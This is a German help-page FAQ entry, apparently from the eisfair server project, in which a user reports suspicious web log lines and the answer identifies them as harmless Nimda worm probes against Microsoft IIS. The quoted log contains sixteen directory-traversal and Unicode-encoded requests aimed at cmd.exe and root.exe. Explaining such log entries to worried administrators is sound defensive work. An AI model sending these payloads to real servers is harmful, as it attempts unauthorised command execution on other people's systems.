| Frage: | Hilfe! Mich versucht jemand zu hacken!
In meiner Logfile tauchen diese Einträge auf:
| Code: |
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
|
|
| | Antwort: | Keine Angst, das ist nur der Nimdawurm, der guckt ob auf deinem eisfair ein IIS (Internet-Information-Server) von Microsoft läuft.
Er sucht nach einer Sicherheitslücke, die dem Script-Kiddie ermöglicht Programme auf Windows-Rechnern auszuführen, die nicht den Patch gegen den Nimdawurm haben.
CodeRed ist auch ein Wurm, der deinem Apache ebenfalls nichts anhaben kann. Wenn er deinen Rechner scannt, tauchen ähnliche kryptische Logeinträge auf. | | betroffene Betriebssysteme: | eisfair | | letzte Aktualisierung am 03.06.2003 | |
